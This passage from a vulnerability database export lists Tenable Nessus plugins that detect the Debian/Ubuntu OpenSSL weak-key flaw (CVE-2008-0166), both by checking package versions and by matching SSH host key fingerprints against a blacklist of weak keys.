audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-client / openssh-server\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-28T21:21:13", "bulletinFamily": "scanner", "description": "The remote SSH host key has been generated on a Debian \nor Ubuntu system which contains a bug in the random number\ngenerator of its OpenSSL library.\n\nThe problem is due to a Debian packager removing nearly all\nsources of entropy in the remote version of OpenSSL.\n\nAn attacker can easily obtain the private part of the remote\nkey and use this to set up decipher the remote session or\nset up a man in the middle attack.", "modified": "2008-05-14T00:00:00", "id": "SSH_DEBIAN_WEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/32314", "published": "2008-05-14T00:00:00", "title": "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness", "type": "nessus", "sourceData": "#TRUSTED 20d4f28abb555379ba7e9c6e248c879d0f3f743e6ad6748745b190e4347dbaefe59a972f8ccd97e7abe8fcd937a1877730de360e86656ef7ca2758dbdf38cf318be1daa21bfee26f0f8b7519acac0b35abb8a29cbab910a0ab1d5617816dd4233c56145a4e981e277572755b12aae0f41da958f8d1efcde44fc27434ef41a396f5f287dfb88b3ba44bd402f1fc4220c58bc7be9a54d95c0372f3598e679fe26b1c1d09a2e673097f2849eb4ba0b2dd87c102831b86179f7ca2e657faf344f8011fa61e1efb27aa9386f20cecabfb420b2e83934463e9157af2f0992b58e896d775ef681d3522161685ca3e74f811742c687f75b3b2451b23aa9e32d20e0a508c438a9bbf7dc4bb0cb6a40059030e7f2b7b481b728550b2e299863809ec21999de89d6457cbc646957300560121f4a7d78438d3170323473c93cebf50b6002df23df3e80b657efa67fd79686b8108700c484371c11bb73acf4f52a2b653dd488e52baa6a823876ab1d6c0862cfba292887f299d0626b7ebe512922c218edf80a560a15b8bcf4174545b538e3f5a5c3aa43d43fe9c1bcaf822a16841c56ee617a3054137c18e9577be7c54f48105909abd6fc2d073a1a0ad8f08e465ea4358fea82706fdf709c9b4e6da919755d5ca0a397f46ad905b7dee965d8df692d77ba024ea7250f4cacd99e6a90728cb57ee8281e99c767ca53bf0b8b4c9313ded40175c\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(32314);\n script_version (\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\"); \n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n\n script_name(english:\"Debian OpenSSH/OpenSSL Package Random Number Generator Weakness\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SSH host keys are weak.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote SSH host key has been generated on a Debian \nor Ubuntu system which contains a bug in the random number\ngenerator of its OpenSSL library.\n\nThe problem is due to a Debian packager removing nearly all\nsources of entropy in the remote version of OpenSSL.\n\nAn attacker can easily obtain the private part of the remote\nkey and use this to set up decipher the remote session or\nset up a man in the middle attack.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Consider all cryptographic material generated on the remote host\nto be guessable. In particuliar, all SSH, SSL and OpenVPN key\nmaterial should be re-generated.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?107f9bdc\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f14f4224\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\t\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/05/14\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n \n script_summary(english:\"Checks for the remote SSH public key fingerprint\");\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencie(\"ssh_detect.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\n\n\nSSH_RSA = 0;\nSSH_DSS = 1;\n\n\n\nfunction file_read_dword(fd)\n{\n local_var dword;\n\n dword = file_read(fp:fd, length:4);\n dword = getdword(blob:dword, pos:0);\n\n return dword;\n}\n\n\nfunction find_hash_list(type, first, second)\n{\n local_var list, fd, i, j, main_index, sec_index, c, offset, length, len, pos, file;\n local_var tmp_list;\n\n if (type == SSH_RSA)\n file = \"blacklist_rsa.inc\";\n else if (type == SSH_DSS)\n file = \"blacklist_dss.inc\";\n\n if ( ! file_stat(file) ) return NULL;\n\n fd = file_open(name:file, mode:\"r\");\n if (!fd) return NULL;\n\n main_index = file_read_dword(fd:fd);\n\n for (i=0; i<main_index; i++)\n {\n c = file_read(fp:fd, length:1);\n offset = file_read_dword(fd:fd);\n length = file_read_dword(fd:fd);\n\n if (c == first)\n {\n file_seek(fp:fd, offset:offset);\n sec_index = file_read_dword(fd:fd);\n\n for (j=0; j<sec_index; j++)\n {\n c = file_read(fp:fd, length:1);\n offset = file_read_dword(fd:fd);\n length = file_read_dword(fd:fd);\n\n if (c == second)\n {\n file_seek(fp:fd, offset:offset);\n tmp_list = file_read(fp:fd, length:length);\n\n len = strlen(tmp_list);\n pos = 0;\n\n for (j=0; j<len; j+=10)\n list[pos++] = substr(tmp_list, j, j+9);\n\n break;\n }\n }\n\n break;\n }\n }\n\n file_close(fd);\n\n return list;\n}\n\nfunction is_vulnerable_fingerprint(type, fp)\n{\n local_var list, i, len;\n\n list = find_hash_list(type:type, first:fp[0], second:fp[1]);\n if (isnull(list))\n return FALSE;\n\n len = max_index(list);\n \n for (i=0; i<len; i++)\n if (list[i] == fp)\n return TRUE;\n\n return FALSE;\n}\n\nports = get_kb_list(\"Services/ssh\");\nif (isnull(ports)) ports = make_list(22);\nelse ports = make_list(ports);\n\nforeach port (ports)\n{\n fingerprint = get_kb_item(\"SSH/Fingerprint/ssh-rsa/\"+port);\n if (fingerprint)\n {\n ret = is_vulnerable_fingerprint(type:SSH_RSA, fp:substr(ssh_hex2raw(s:fingerprint), 6, 15));\n if (ret)\n {\n security_hole(port);\n exit(0);\n }\n }\n\n fingerprint = get_kb_item(\"SSH/Fingerprint/ssh-dss\");\n if (fingerprint)\n {\n ret = is_vulnerable_fingerprint(type:SSH_DSS, fp:substr(ssh_hex2raw(s:fingerprint), 6, 15));\n if (ret)\n {\n security_hole(port);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:38:16", "bulletinFamily": "scanner", "description": "A weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nThis vulnerability only affects operating systems which (like Ubuntu)\nare based on Debian. However, other systems can be indirectly affected\nif weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all\nusers to act immediately to secure their systems. (CVE-2008-0166)\n\n== Who is affected ==\n\nSystems which are running any of the following releases :\n\n* Ubuntu 7.04 (Feisty) * Ubuntu 7.10 (Gutsy) * Ubuntu 8.04 LTS (Hardy)\n* Ubuntu ", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-612-1.NASL", "href": "https://www.tenable.com/plugins/nessus/65108", "published": "2013-03-09T00:00:00", "title": "Ubuntu 7.04 / 7.10 / 8.04 LTS : openssl vulnerability (USN-612-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-612-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65108);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n script_xref(name:\"USN\", value:\"612-1\");\n\n script_name(english:\"Ubuntu 7.04 / 7.10 / 8.04 LTS : openssl vulnerability (USN-612-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nThis vulnerability only affects operating systems which (like Ubuntu)\nare based on Debian. However, other systems can be indirectly affected\nif weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all\nusers to act immediately to secure their systems. (CVE-2008-0166)\n\n== Who is affected ==\n\nSystems which are running any of the following releases :\n\n* Ubuntu 7.04 (Feisty) * Ubuntu 7.10 (Gutsy) * Ubuntu 8.04 LTS (Hardy)\n* Ubuntu 'Intrepid Ibex' (development): libssl <= 0.9.8g-8 * Debian\n4.0 (etch) (see corresponding Debian security advisory)\n\nand have openssh-server installed or have been used to create an\nOpenSSH key or X.509 (SSL) certificate.\n\nAll OpenSSH and X.509 keys generated on such systems must be\nconsidered untrustworthy, regardless of the system on which they are\nused, even after the update has been applied.\n\nThis includes the automatically generated host keys used by OpenSSH,\nwhich are the basis for its server spoofing and man-in-the-middle\nprotection.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/612-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssl0.9.8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8c-4ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8e-5ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8g-4ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl0.9.8\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:38:16", "bulletinFamily": "scanner", "description": "A weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of shared encryption keys and SSL/TLS certificates in OpenVPN.\n\nThis vulnerability only affects operating systems which (like Ubuntu)\nare based on Debian. However, other systems can be indirectly affected\nif weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all\nusers to act immediately to secure their systems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-612-3.NASL", "href": "https://www.tenable.com/plugins/nessus/32357", "published": "2008-05-16T00:00:00", "title": "Ubuntu 7.04 / 7.10 / 8.04 LTS : openvpn vulnerability (USN-612-3)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-612-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32357);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n script_xref(name:\"USN\", value:\"612-3\");\n\n script_name(english:\"Ubuntu 7.04 / 7.10 / 8.04 LTS : openvpn vulnerability (USN-612-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of shared encryption keys and SSL/TLS certificates in OpenVPN.\n\nThis vulnerability only affects operating systems which (like Ubuntu)\nare based on Debian. However, other systems can be indirectly affected\nif weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all\nusers to act immediately to secure their systems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/612-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openvpn package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openvpn\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openvpn\", pkgver:\"2.0.9-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"openvpn\", pkgver:\"2.0.9-8ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openvpn\", pkgver:\"2.1~rc7-1ubuntu3.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openvpn\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:38:16", "bulletinFamily": "scanner", "description": "Matt Zimmerman discovered that entries in ~/.ssh/authorized_keys with\noptions (such as ", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-612-5.NASL", "href": "https://www.tenable.com/plugins/nessus/32359", "published": "2008-05-16T00:00:00", "title": "Ubuntu 7.04 / 7.10 / 8.04 LTS : openssh update (USN-612-5)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-612-5. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32359);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-0166\", \"CVE-2008-2285\");\n script_bugtraq_id(29179);\n script_xref(name:\"USN\", value:\"612-5\");\n\n script_name(english:\"Ubuntu 7.04 / 7.10 / 8.04 LTS : openssh update (USN-612-5)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matt Zimmerman discovered that entries in ~/.ssh/authorized_keys with\noptions (such as 'no-port-forwarding' or forced commands) were ignored\nby the new ssh-vulnkey tool introduced in OpenSSH (see USN-612-2).\nThis could cause some compromised keys not to be listed in\nssh-vulnkey's output.\n\nThis update also adds more information to ssh-vulnkey's manual page.\n\nA weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/612-5/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-client-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ssh-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openssh-client\", pkgver:\"1:4.3p2-8ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openssh-client-udeb\", pkgver:\"1:4.3p2-8ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openssh-server\", pkgver:\"4.3p2-8ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"ssh\", pkgver:\"4.3p2-8ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"ssh-askpass-gnome\", pkgver:\"4.3p2-8ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"ssh-krb5\", pkgver:\"4.3p2-8ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"openssh-client\", pkgver:\"1:4.6p1-5ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"openssh-client-udeb\", pkgver:\"1:4.6p1-5ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"openssh-server\", pkgver:\"4.6p1-5ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ssh\", pkgver:\"4.6p1-5ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ssh-askpass-gnome\", pkgver:\"4.6p1-5ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ssh-krb5\", pkgver:\"4.6p1-5ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssh-client\", pkgver:\"1:4.7p1-8ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssh-client-udeb\", pkgver:\"1:4.7p1-8ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssh-server\", pkgver:\"4.7p1-8ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ssh\", pkgver:\"4.7p1-8ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ssh-askpass-gnome\", pkgver:\"4.7p1-8ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ssh-krb5\", pkgver:\"4.7p1-8ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-client / openssh-client-udeb / openssh-server / ssh / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T02:21:01", "bulletinFamily": "scanner", "description": "The recently announced vulnerability in Debian", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-1576.NASL", "href": "https://www.tenable.com/plugins/nessus/32377", "published": "2008-05-19T00:00:00", "title": "Debian DSA-1576-1 : openssh - predictable random number generator", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1576. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32377);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n script_xref(name:\"DSA\", value:\"1576\");\n\n script_name(english:\"Debian DSA-1576-1 : openssh - predictable random number generator\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The recently announced vulnerability in 